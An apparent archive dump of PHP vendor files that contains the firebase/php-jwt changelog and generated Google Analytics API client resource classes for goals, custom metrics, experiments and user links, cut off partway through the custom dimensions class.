} } google-api/vendor/firebase/php-jwt/CHANGELOG.md000064400000020771147600400120015047 0ustar00# Changelog ## [6.10.0](https://github.com/firebase/php-jwt/compare/v6.9.0...v6.10.0) (2023-11-28) ### Features * allow typ header override ([#546](https://github.com/firebase/php-jwt/issues/546)) ([79cb30b](https://github.com/firebase/php-jwt/commit/79cb30b729a22931b2fbd6b53f20629a83031ba9)) ## [6.9.0](https://github.com/firebase/php-jwt/compare/v6.8.1...v6.9.0) (2023-10-04) ### Features * add payload to jwt exception ([#521](https://github.com/firebase/php-jwt/issues/521)) ([175edf9](https://github.com/firebase/php-jwt/commit/175edf958bb61922ec135b2333acf5622f2238a2)) ## [6.8.1](https://github.com/firebase/php-jwt/compare/v6.8.0...v6.8.1) (2023-07-14) ### Bug Fixes * accept float claims but round down to ignore them ([#492](https://github.com/firebase/php-jwt/issues/492)) ([3936842](https://github.com/firebase/php-jwt/commit/39368423beeaacb3002afa7dcb75baebf204fe7e)) * different BeforeValidException messages for nbf and iat ([#526](https://github.com/firebase/php-jwt/issues/526)) ([0a53cf2](https://github.com/firebase/php-jwt/commit/0a53cf2986e45c2bcbf1a269f313ebf56a154ee4)) ## [6.8.0](https://github.com/firebase/php-jwt/compare/v6.7.0...v6.8.0) (2023-06-14) ### Features * add support for P-384 curve ([#515](https://github.com/firebase/php-jwt/issues/515)) ([5de4323](https://github.com/firebase/php-jwt/commit/5de4323f4baf4d70bca8663bd87682a69c656c3d)) ### Bug Fixes * handle invalid http responses ([#508](https://github.com/firebase/php-jwt/issues/508)) ([91c39c7](https://github.com/firebase/php-jwt/commit/91c39c72b22fc3e1191e574089552c1f2041c718)) ## [6.7.0](https://github.com/firebase/php-jwt/compare/v6.6.0...v6.7.0) (2023-06-14) ### Features * add ed25519 support to JWK (public keys) ([#452](https://github.com/firebase/php-jwt/issues/452)) ([e53979a](https://github.com/firebase/php-jwt/commit/e53979abae927de916a75b9d239cfda8ce32be2a)) ## [6.6.0](https://github.com/firebase/php-jwt/compare/v6.5.0...v6.6.0) (2023-06-13) ### Features * allow get headers when decoding token ([#442](https://github.com/firebase/php-jwt/issues/442)) ([fb85f47](https://github.com/firebase/php-jwt/commit/fb85f47cfaeffdd94faf8defdf07164abcdad6c3)) ### Bug Fixes * only check iat if nbf is not used ([#493](https://github.com/firebase/php-jwt/issues/493)) ([398ccd2](https://github.com/firebase/php-jwt/commit/398ccd25ea12fa84b9e4f1085d5ff448c21ec797)) ## [6.5.0](https://github.com/firebase/php-jwt/compare/v6.4.0...v6.5.0) (2023-05-12) ### Bug Fixes * allow KID of '0' ([#505](https://github.com/firebase/php-jwt/issues/505)) ([9dc46a9](https://github.com/firebase/php-jwt/commit/9dc46a9c3e5801294249cfd2554c5363c9f9326a)) ### Miscellaneous Chores * drop support for PHP 7.3 ([#495](https://github.com/firebase/php-jwt/issues/495)) ## [6.4.0](https://github.com/firebase/php-jwt/compare/v6.3.2...v6.4.0) (2023-02-08) ### Features * add support for W3C ES256K ([#462](https://github.com/firebase/php-jwt/issues/462)) ([213924f](https://github.com/firebase/php-jwt/commit/213924f51936291fbbca99158b11bd4ae56c2c95)) * improve caching by only decoding jwks when necessary ([#486](https://github.com/firebase/php-jwt/issues/486)) ([78d3ed1](https://github.com/firebase/php-jwt/commit/78d3ed1073553f7d0bbffa6c2010009a0d483d5c)) ## [6.3.2](https://github.com/firebase/php-jwt/compare/v6.3.1...v6.3.2) (2022-11-01) ### Bug Fixes * check kid before using as array index ([bad1b04](https://github.com/firebase/php-jwt/commit/bad1b040d0c736bbf86814c6b5ae614f517cf7bd)) ## [6.3.1](https://github.com/firebase/php-jwt/compare/v6.3.0...v6.3.1) (2022-11-01) ### Bug Fixes * casing of GET for PSR compat ([#451](https://github.com/firebase/php-jwt/issues/451)) ([60b52b7](https://github.com/firebase/php-jwt/commit/60b52b71978790eafcf3b95cfbd83db0439e8d22)) * string interpolation format for php 8.2 ([#446](https://github.com/firebase/php-jwt/issues/446)) ([2e07d8a](https://github.com/firebase/php-jwt/commit/2e07d8a1524d12b69b110ad649f17461d068b8f2)) ## 6.3.0 / 2022-07-15 - Added ES256 support to JWK parsing ([#399](https://github.com/firebase/php-jwt/pull/399)) - Fixed potential caching error in `CachedKeySet` by caching jwks as strings ([#435](https://github.com/firebase/php-jwt/pull/435)) ## 6.2.0 / 2022-05-14 - Added `CachedKeySet` ([#397](https://github.com/firebase/php-jwt/pull/397)) - Added `$defaultAlg` parameter to `JWT::parseKey` and `JWT::parseKeySet` ([#426](https://github.com/firebase/php-jwt/pull/426)). ## 6.1.0 / 2022-03-23 - Drop support for PHP 5.3, 5.4, 5.5, 5.6, and 7.0 - Add parameter typing and return types where possible ## 6.0.0 / 2022-01-24 - **Backwards-Compatibility Breaking Changes**: See the [Release Notes](https://github.com/firebase/php-jwt/releases/tag/v6.0.0) for more information. - New Key object to prevent key/algorithm type confusion (#365) - Add JWK support (#273) - Add ES256 support (#256) - Add ES384 support (#324) - Add Ed25519 support (#343) ## 5.0.0 / 2017-06-26 - Support RS384 and RS512. See [#117](https://github.com/firebase/php-jwt/pull/117). Thanks [@joostfaassen](https://github.com/joostfaassen)! - Add an example for RS256 openssl. See [#125](https://github.com/firebase/php-jwt/pull/125). Thanks [@akeeman](https://github.com/akeeman)! - Detect invalid Base64 encoding in signature. See [#162](https://github.com/firebase/php-jwt/pull/162). Thanks [@psignoret](https://github.com/psignoret)! - Update `JWT::verify` to handle OpenSSL errors. See [#159](https://github.com/firebase/php-jwt/pull/159). Thanks [@bshaffer](https://github.com/bshaffer)! - Add `array` type hinting to `decode` method See [#101](https://github.com/firebase/php-jwt/pull/101). Thanks [@hywak](https://github.com/hywak)! - Add all JSON error types. See [#110](https://github.com/firebase/php-jwt/pull/110). Thanks [@gbalduzzi](https://github.com/gbalduzzi)! - Bugfix 'kid' not in given key list. See [#129](https://github.com/firebase/php-jwt/pull/129). Thanks [@stampycode](https://github.com/stampycode)! - Miscellaneous cleanup, documentation and test fixes. See [#107](https://github.com/firebase/php-jwt/pull/107), [#115](https://github.com/firebase/php-jwt/pull/115), [#160](https://github.com/firebase/php-jwt/pull/160), [#161](https://github.com/firebase/php-jwt/pull/161), and [#165](https://github.com/firebase/php-jwt/pull/165). Thanks [@akeeman](https://github.com/akeeman), [@chinedufn](https://github.com/chinedufn), and [@bshaffer](https://github.com/bshaffer)! ## 4.0.0 / 2016-07-17 - Add support for late static binding. See [#88](https://github.com/firebase/php-jwt/pull/88) for details. Thanks to [@chappy84](https://github.com/chappy84)! - Use static `$timestamp` instead of `time()` to improve unit testing. See [#93](https://github.com/firebase/php-jwt/pull/93) for details. Thanks to [@josephmcdermott](https://github.com/josephmcdermott)! - Fixes to exceptions classes. See [#81](https://github.com/firebase/php-jwt/pull/81) for details. Thanks to [@Maks3w](https://github.com/Maks3w)! - Fixes to PHPDoc. See [#76](https://github.com/firebase/php-jwt/pull/76) for details. Thanks to [@akeeman](https://github.com/akeeman)! ## 3.0.0 / 2015-07-22 - Minimum PHP version updated from `5.2.0` to `5.3.0`. - Add `\Firebase\JWT` namespace. See [#59](https://github.com/firebase/php-jwt/pull/59) for details. Thanks to [@Dashron](https://github.com/Dashron)! - Require a non-empty key to decode and verify a JWT. See [#60](https://github.com/firebase/php-jwt/pull/60) for details. Thanks to [@sjones608](https://github.com/sjones608)! - Cleaner documentation blocks in the code. See [#62](https://github.com/firebase/php-jwt/pull/62) for details. Thanks to [@johanderuijter](https://github.com/johanderuijter)! ## 2.2.0 / 2015-06-22 - Add support for adding custom, optional JWT headers to `JWT::encode()`. See [#53](https://github.com/firebase/php-jwt/pull/53/files) for details. Thanks to [@mcocaro](https://github.com/mcocaro)! ## 2.1.0 / 2015-05-20 - Add support for adding a leeway to `JWT:decode()` that accounts for clock skew between signing and verifying entities. Thanks to [@lcabral](https://github.com/lcabral)! - Add support for passing an object implementing the `ArrayAccess` interface for `$keys` argument in `JWT::decode()`. Thanks to [@aztech-dev](https://github.com/aztech-dev)! ## 2.0.0 / 2015-04-01 - **Note**: It is strongly recommended that you update to > v2.0.0 to address known security vulnerabilities in prior versions when both symmetric and asymmetric keys are used together. - Update signature for `JWT::decode(...)` to require an array of supported algorithms to use when verifying token signatures. google-api/vendor/google/apiclient-services/src/Analytics/Resource/ManagementGoals.php000064400000012625147600400120025211 0ustar00 * $analyticsService = new Google\Service\Analytics(...); * $goals = $analyticsService->management_goals; * */ class ManagementGoals extends \Google\Service\Resource { /** * Gets a goal to which the user has access. (goals.get) * * @param string $accountId Account ID to retrieve the goal for. * @param string $webPropertyId Web property ID to retrieve the goal for. * @param string $profileId View (Profile) ID to retrieve the goal for. * @param string $goalId Goal ID to retrieve the goal for. * @param array $optParams Optional parameters. * @return Goal */ public function get($accountId, $webPropertyId, $profileId, $goalId, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'profileId' => $profileId, 'goalId' => $goalId]; $params = array_merge($params, $optParams); return $this->call('get', [$params], Goal::class); } /** * Create a new goal. (goals.insert) * * @param string $accountId Account ID to create the goal for. * @param string $webPropertyId Web property ID to create the goal for. * @param string $profileId View (Profile) ID to create the goal for. * @param Goal $postBody * @param array $optParams Optional parameters. * @return Goal */ public function insert($accountId, $webPropertyId, $profileId, Goal $postBody, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'profileId' => $profileId, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('insert', [$params], Goal::class); } /** * Lists goals to which the user has access. (goals.listManagementGoals) * * @param string $accountId Account ID to retrieve goals for. Can either be a * specific account ID or '~all', which refers to all the accounts that user has * access to. * @param string $webPropertyId Web property ID to retrieve goals for. Can * either be a specific web property ID or '~all', which refers to all the web * properties that user has access to. * @param string $profileId View (Profile) ID to retrieve goals for. Can either * be a specific view (profile) ID or '~all', which refers to all the views * (profiles) that user has access to. * @param array $optParams Optional parameters. * * @opt_param int max-results The maximum number of goals to include in this * response. * @opt_param int start-index An index of the first goal to retrieve. Use this * parameter as a pagination mechanism along with the max-results parameter. * @return Goals */ public function listManagementGoals($accountId, $webPropertyId, $profileId, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'profileId' => $profileId]; $params = array_merge($params, $optParams); return $this->call('list', [$params], Goals::class); } /** * Updates an existing goal. This method supports patch semantics. (goals.patch) * * @param string $accountId Account ID to update the goal. * @param string $webPropertyId Web property ID to update the goal. * @param string $profileId View (Profile) ID to update the goal. * @param string $goalId Index of the goal to be updated. * @param Goal $postBody * @param array $optParams Optional parameters. * @return Goal */ public function patch($accountId, $webPropertyId, $profileId, $goalId, Goal $postBody, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'profileId' => $profileId, 'goalId' => $goalId, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('patch', [$params], Goal::class); } /** * Updates an existing goal. (goals.update) * * @param string $accountId Account ID to update the goal. * @param string $webPropertyId Web property ID to update the goal. * @param string $profileId View (Profile) ID to update the goal. * @param string $goalId Index of the goal to be updated. * @param Goal $postBody * @param array $optParams Optional parameters. * @return Goal */ public function update($accountId, $webPropertyId, $profileId, $goalId, Goal $postBody, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'profileId' => $profileId, 'goalId' => $goalId, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('update', [$params], Goal::class); } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ManagementGoals::class, 'Google_Service_Analytics_Resource_ManagementGoals'); google-api/vendor/google/apiclient-services/src/Analytics/Resource/ManagementCustomMetrics.php000064400000012674147600400120026751 0ustar00 * $analyticsService = new Google\Service\Analytics(...); * $customMetrics = $analyticsService->management_customMetrics; * */ class ManagementCustomMetrics extends \Google\Service\Resource { /** * Get a custom metric to which the user has access. (customMetrics.get) * * @param string $accountId Account ID for the custom metric to retrieve. * @param string $webPropertyId Web property ID for the custom metric to * retrieve. * @param string $customMetricId The ID of the custom metric to retrieve. * @param array $optParams Optional parameters. * @return CustomMetric */ public function get($accountId, $webPropertyId, $customMetricId, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'customMetricId' => $customMetricId]; $params = array_merge($params, $optParams); return $this->call('get', [$params], CustomMetric::class); } /** * Create a new custom metric. (customMetrics.insert) * * @param string $accountId Account ID for the custom metric to create. * @param string $webPropertyId Web property ID for the custom dimension to * create. * @param CustomMetric $postBody * @param array $optParams Optional parameters. * @return CustomMetric */ public function insert($accountId, $webPropertyId, CustomMetric $postBody, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('insert', [$params], CustomMetric::class); } /** * Lists custom metrics to which the user has access. * (customMetrics.listManagementCustomMetrics) * * @param string $accountId Account ID for the custom metrics to retrieve. * @param string $webPropertyId Web property ID for the custom metrics to * retrieve. * @param array $optParams Optional parameters. * * @opt_param int max-results The maximum number of custom metrics to include in * this response. * @opt_param int start-index An index of the first entity to retrieve. Use this * parameter as a pagination mechanism along with the max-results parameter. * @return CustomMetrics */ public function listManagementCustomMetrics($accountId, $webPropertyId, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId]; $params = array_merge($params, $optParams); return $this->call('list', [$params], CustomMetrics::class); } /** * Updates an existing custom metric. This method supports patch semantics. * (customMetrics.patch) * * @param string $accountId Account ID for the custom metric to update. * @param string $webPropertyId Web property ID for the custom metric to update. * @param string $customMetricId Custom metric ID for the custom metric to * update. * @param CustomMetric $postBody * @param array $optParams Optional parameters. * * @opt_param bool ignoreCustomDataSourceLinks Force the update and ignore any * warnings related to the custom metric being linked to a custom data source / * data set. * @return CustomMetric */ public function patch($accountId, $webPropertyId, $customMetricId, CustomMetric $postBody, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'customMetricId' => $customMetricId, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('patch', [$params], CustomMetric::class); } /** * Updates an existing custom metric. (customMetrics.update) * * @param string $accountId Account ID for the custom metric to update. * @param string $webPropertyId Web property ID for the custom metric to update. * @param string $customMetricId Custom metric ID for the custom metric to * update. * @param CustomMetric $postBody * @param array $optParams Optional parameters. * * @opt_param bool ignoreCustomDataSourceLinks Force the update and ignore any * warnings related to the custom metric being linked to a custom data source / * data set. * @return CustomMetric */ public function update($accountId, $webPropertyId, $customMetricId, CustomMetric $postBody, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'customMetricId' => $customMetricId, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('update', [$params], CustomMetric::class); } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ManagementCustomMetrics::class, 'Google_Service_Analytics_Resource_ManagementCustomMetrics'); google-api/vendor/google/apiclient-services/src/Analytics/Resource/ManagementUnsampledReports.php000064400000011577147600400120027460 0ustar00 * $analyticsService = new Google\Service\Analytics(...); * $unsampledReports = $analyticsService->management_unsampledReports; * */ class ManagementUnsampledReports extends \Google\Service\Resource { /** * Deletes an unsampled report. (unsampledReports.delete) * * @param string $accountId Account ID to delete the unsampled report for. * @param string $webPropertyId Web property ID to delete the unsampled reports * for. * @param string $profileId View (Profile) ID to delete the unsampled report * for. * @param string $unsampledReportId ID of the unsampled report to be deleted. * @param array $optParams Optional parameters. */ public function delete($accountId, $webPropertyId, $profileId, $unsampledReportId, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'profileId' => $profileId, 'unsampledReportId' => $unsampledReportId]; $params = array_merge($params, $optParams); return $this->call('delete', [$params]); } /** * Returns a single unsampled report. (unsampledReports.get) * * @param string $accountId Account ID to retrieve unsampled report for. * @param string $webPropertyId Web property ID to retrieve unsampled reports * for. * @param string $profileId View (Profile) ID to retrieve unsampled report for. * @param string $unsampledReportId ID of the unsampled report to retrieve. * @param array $optParams Optional parameters. * @return UnsampledReport */ public function get($accountId, $webPropertyId, $profileId, $unsampledReportId, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'profileId' => $profileId, 'unsampledReportId' => $unsampledReportId]; $params = array_merge($params, $optParams); return $this->call('get', [$params], UnsampledReport::class); } /** * Create a new unsampled report. (unsampledReports.insert) * * @param string $accountId Account ID to create the unsampled report for. * @param string $webPropertyId Web property ID to create the unsampled report * for. * @param string $profileId View (Profile) ID to create the unsampled report * for. * @param UnsampledReport $postBody * @param array $optParams Optional parameters. * @return UnsampledReport */ public function insert($accountId, $webPropertyId, $profileId, UnsampledReport $postBody, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'profileId' => $profileId, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('insert', [$params], UnsampledReport::class); } /** * Lists unsampled reports to which the user has access. * (unsampledReports.listManagementUnsampledReports) * * @param string $accountId Account ID to retrieve unsampled reports for. Must * be a specific account ID, ~all is not supported. * @param string $webPropertyId Web property ID to retrieve unsampled reports * for. Must be a specific web property ID, ~all is not supported. * @param string $profileId View (Profile) ID to retrieve unsampled reports for. * Must be a specific view (profile) ID, ~all is not supported. * @param array $optParams Optional parameters. * * @opt_param int max-results The maximum number of unsampled reports to include * in this response. * @opt_param int start-index An index of the first unsampled report to * retrieve. Use this parameter as a pagination mechanism along with the max- * results parameter. * @return UnsampledReports */ public function listManagementUnsampledReports($accountId, $webPropertyId, $profileId, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'profileId' => $profileId]; $params = array_merge($params, $optParams); return $this->call('list', [$params], UnsampledReports::class); } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ManagementUnsampledReports::class, 'Google_Service_Analytics_Resource_ManagementUnsampledReports'); google-api/vendor/google/apiclient-services/src/Analytics/Resource/UserDeletion.php000064400000002066147600400120024547 0ustar00 * $analyticsService = new Google\Service\Analytics(...); * $userDeletion = $analyticsService->userDeletion; * */ class UserDeletion extends \Google\Service\Resource { } // Adding a class alias for backwards compatibility with the previous class name. class_alias(UserDeletion::class, 'Google_Service_Analytics_Resource_UserDeletion'); google-api/vendor/google/apiclient-services/src/Analytics/Resource/MetadataColumns.php000064400000003133147600400120025222 0ustar00 * $analyticsService = new Google\Service\Analytics(...); * $columns = $analyticsService->metadata_columns; * */ class MetadataColumns extends \Google\Service\Resource { /** * Lists all columns for a report type (columns.listMetadataColumns) * * @param string $reportType Report type. Allowed Values: 'ga'. Where 'ga' * corresponds to the Core Reporting API * @param array $optParams Optional parameters. * @return Columns */ public function listMetadataColumns($reportType, $optParams = []) { $params = ['reportType' => $reportType]; $params = array_merge($params, $optParams); return $this->call('list', [$params], Columns::class); } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(MetadataColumns::class, 'Google_Service_Analytics_Resource_MetadataColumns'); google-api/vendor/google/apiclient-services/src/Analytics/Resource/ManagementProfileUserLinks.php000064400000011670147600400120027403 0ustar00 * $analyticsService = new Google\Service\Analytics(...); * $profileUserLinks = $analyticsService->management_profileUserLinks; * */ class ManagementProfileUserLinks extends \Google\Service\Resource { /** * Removes a user from the given view (profile). (profileUserLinks.delete) * * @param string $accountId Account ID to delete the user link for. * @param string $webPropertyId Web Property ID to delete the user link for. * @param string $profileId View (Profile) ID to delete the user link for. * @param string $linkId Link ID to delete the user link for. * @param array $optParams Optional parameters. */ public function delete($accountId, $webPropertyId, $profileId, $linkId, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'profileId' => $profileId, 'linkId' => $linkId]; $params = array_merge($params, $optParams); return $this->call('delete', [$params]); } /** * Adds a new user to the given view (profile). (profileUserLinks.insert) * * @param string $accountId Account ID to create the user link for. * @param string $webPropertyId Web Property ID to create the user link for. * @param string $profileId View (Profile) ID to create the user link for. * @param EntityUserLink $postBody * @param array $optParams Optional parameters. * @return EntityUserLink */ public function insert($accountId, $webPropertyId, $profileId, EntityUserLink $postBody, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'profileId' => $profileId, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('insert', [$params], EntityUserLink::class); } /** * Lists profile-user links for a given view (profile). * (profileUserLinks.listManagementProfileUserLinks) * * @param string $accountId Account ID which the given view (profile) belongs * to. * @param string $webPropertyId Web Property ID which the given view (profile) * belongs to. Can either be a specific web property ID or '~all', which refers * to all the web properties that user has access to. * @param string $profileId View (Profile) ID to retrieve the profile-user links * for. Can either be a specific profile ID or '~all', which refers to all the * profiles that user has access to. * @param array $optParams Optional parameters. * * @opt_param int max-results The maximum number of profile-user links to * include in this response. * @opt_param int start-index An index of the first profile-user link to * retrieve. Use this parameter as a pagination mechanism along with the max- * results parameter. * @return EntityUserLinks */ public function listManagementProfileUserLinks($accountId, $webPropertyId, $profileId, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'profileId' => $profileId]; $params = array_merge($params, $optParams); return $this->call('list', [$params], EntityUserLinks::class); } /** * Updates permissions for an existing user on the given view (profile). * (profileUserLinks.update) * * @param string $accountId Account ID to update the user link for. * @param string $webPropertyId Web Property ID to update the user link for. * @param string $profileId View (Profile ID) to update the user link for. * @param string $linkId Link ID to update the user link for. * @param EntityUserLink $postBody * @param array $optParams Optional parameters. * @return EntityUserLink */ public function update($accountId, $webPropertyId, $profileId, $linkId, EntityUserLink $postBody, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'profileId' => $profileId, 'linkId' => $linkId, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('update', [$params], EntityUserLink::class); } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ManagementProfileUserLinks::class, 'Google_Service_Analytics_Resource_ManagementProfileUserLinks'); google-api/vendor/google/apiclient-services/src/Analytics/Resource/ManagementExperiments.php000064400000014331147600400120026443 0ustar00 * $analyticsService = new Google\Service\Analytics(...); * $experiments = $analyticsService->management_experiments; * */ class ManagementExperiments extends \Google\Service\Resource { /** * Delete an experiment. (experiments.delete) * * @param string $accountId Account ID to which the experiment belongs * @param string $webPropertyId Web property ID to which the experiment belongs * @param string $profileId View (Profile) ID to which the experiment belongs * @param string $experimentId ID of the experiment to delete * @param array $optParams Optional parameters. */ public function delete($accountId, $webPropertyId, $profileId, $experimentId, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'profileId' => $profileId, 'experimentId' => $experimentId]; $params = array_merge($params, $optParams); return $this->call('delete', [$params]); } /** * Returns an experiment to which the user has access. (experiments.get) * * @param string $accountId Account ID to retrieve the experiment for. * @param string $webPropertyId Web property ID to retrieve the experiment for. * @param string $profileId View (Profile) ID to retrieve the experiment for. * @param string $experimentId Experiment ID to retrieve the experiment for. * @param array $optParams Optional parameters. * @return Experiment */ public function get($accountId, $webPropertyId, $profileId, $experimentId, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'profileId' => $profileId, 'experimentId' => $experimentId]; $params = array_merge($params, $optParams); return $this->call('get', [$params], Experiment::class); } /** * Create a new experiment. (experiments.insert) * * @param string $accountId Account ID to create the experiment for. * @param string $webPropertyId Web property ID to create the experiment for. * @param string $profileId View (Profile) ID to create the experiment for. * @param Experiment $postBody * @param array $optParams Optional parameters. * @return Experiment */ public function insert($accountId, $webPropertyId, $profileId, Experiment $postBody, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'profileId' => $profileId, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('insert', [$params], Experiment::class); } /** * Lists experiments to which the user has access. * (experiments.listManagementExperiments) * * @param string $accountId Account ID to retrieve experiments for. * @param string $webPropertyId Web property ID to retrieve experiments for. * @param string $profileId View (Profile) ID to retrieve experiments for. * @param array $optParams Optional parameters. * * @opt_param int max-results The maximum number of experiments to include in * this response. * @opt_param int start-index An index of the first experiment to retrieve. Use * this parameter as a pagination mechanism along with the max-results * parameter. * @return Experiments */ public function listManagementExperiments($accountId, $webPropertyId, $profileId, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'profileId' => $profileId]; $params = array_merge($params, $optParams); return $this->call('list', [$params], Experiments::class); } /** * Update an existing experiment. This method supports patch semantics. * (experiments.patch) * * @param string $accountId Account ID of the experiment to update. * @param string $webPropertyId Web property ID of the experiment to update. * @param string $profileId View (Profile) ID of the experiment to update. * @param string $experimentId Experiment ID of the experiment to update. * @param Experiment $postBody * @param array $optParams Optional parameters. * @return Experiment */ public function patch($accountId, $webPropertyId, $profileId, $experimentId, Experiment $postBody, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'profileId' => $profileId, 'experimentId' => $experimentId, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('patch', [$params], Experiment::class); } /** * Update an existing experiment. (experiments.update) * * @param string $accountId Account ID of the experiment to update. * @param string $webPropertyId Web property ID of the experiment to update. * @param string $profileId View (Profile) ID of the experiment to update. * @param string $experimentId Experiment ID of the experiment to update. * @param Experiment $postBody * @param array $optParams Optional parameters. * @return Experiment */ public function update($accountId, $webPropertyId, $profileId, $experimentId, Experiment $postBody, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'profileId' => $profileId, 'experimentId' => $experimentId, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('update', [$params], Experiment::class); } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ManagementExperiments::class, 'Google_Service_Analytics_Resource_ManagementExperiments'); google-api/vendor/google/apiclient-services/src/Analytics/Resource/Data.php000064400000002006147600400120023010 0ustar00 * $analyticsService = new Google\Service\Analytics(...); * $data = $analyticsService->data; * */ class Data extends \Google\Service\Resource { } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Data::class, 'Google_Service_Analytics_Resource_Data'); vendor/google/apiclient-services/src/Analytics/Resource/ManagementWebpropertyUserLinks.php000064400000010665147600400120030251 0ustar00google-api * $analyticsService = new Google\Service\Analytics(...); * $webpropertyUserLinks = $analyticsService->management_webpropertyUserLinks; * */ class ManagementWebpropertyUserLinks extends \Google\Service\Resource { /** * Removes a user from the given web property. (webpropertyUserLinks.delete) * * @param string $accountId Account ID to delete the user link for. * @param string $webPropertyId Web Property ID to delete the user link for. * @param string $linkId Link ID to delete the user link for. * @param array $optParams Optional parameters. */ public function delete($accountId, $webPropertyId, $linkId, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'linkId' => $linkId]; $params = array_merge($params, $optParams); return $this->call('delete', [$params]); } /** * Adds a new user to the given web property. (webpropertyUserLinks.insert) * * @param string $accountId Account ID to create the user link for. * @param string $webPropertyId Web Property ID to create the user link for. * @param EntityUserLink $postBody * @param array $optParams Optional parameters. * @return EntityUserLink */ public function insert($accountId, $webPropertyId, EntityUserLink $postBody, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('insert', [$params], EntityUserLink::class); } /** * Lists webProperty-user links for a given web property. * (webpropertyUserLinks.listManagementWebpropertyUserLinks) * * @param string $accountId Account ID which the given web property belongs to. * @param string $webPropertyId Web Property ID for the webProperty-user links * to retrieve. Can either be a specific web property ID or '~all', which refers * to all the web properties that user has access to. * @param array $optParams Optional parameters. * * @opt_param int max-results The maximum number of webProperty-user Links to * include in this response. * @opt_param int start-index An index of the first webProperty-user link to * retrieve. Use this parameter as a pagination mechanism along with the max- * results parameter. * @return EntityUserLinks */ public function listManagementWebpropertyUserLinks($accountId, $webPropertyId, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId]; $params = array_merge($params, $optParams); return $this->call('list', [$params], EntityUserLinks::class); } /** * Updates permissions for an existing user on the given web property. * (webpropertyUserLinks.update) * * @param string $accountId Account ID to update the account-user link for. * @param string $webPropertyId Web property ID to update the account-user link * for. * @param string $linkId Link ID to update the account-user link for. * @param EntityUserLink $postBody * @param array $optParams Optional parameters. * @return EntityUserLink */ public function update($accountId, $webPropertyId, $linkId, EntityUserLink $postBody, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'linkId' => $linkId, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('update', [$params], EntityUserLink::class); } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ManagementWebpropertyUserLinks::class, 'Google_Service_Analytics_Resource_ManagementWebpropertyUserLinks'); google-api/vendor/google/apiclient-services/src/Analytics/Resource/ManagementCustomDimensions.php000064400000013211147600400120027437 0ustar00 * $analyticsService = new Google\Service\Analytics(...); * $customDimensions = $analyticsService->management_customDimensions; * */ class ManagementCustomDimensions extends \Google\Service\Resource { /** * Get a custom dimension to which the user has access. (customDimensions.get) * * @param string $accountId Account ID for the custom dimension to retrieve. * @param string $webPropertyId Web property ID for the custom dimension to * retrieve. * @param string $customDimensionId The ID of the custom dimension to retrieve. * @param array $optParams Optional parameters. * @return CustomDimension */ public function get($accountId, $webPropertyId, $customDimensionId, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'customDimensionId' => $customDimensionId]; $params = array_merge($params, $optParams); return $this->call('get', [$params], CustomDimension::class); } /** * Create a new custom dimension. (customDimensions.insert) * * @param string $accountId Account ID for the custom dimension to create. * @param string $webPropertyId Web property ID for the custom dimension to * create. * @param CustomDimension $postBody * @param array $optParams Optional parameters. * @return CustomDimension */ public function insert($accountId, $webPropertyId, CustomDimension $postBody, $optParams = []) { $params = ['accountId' => $accountId, 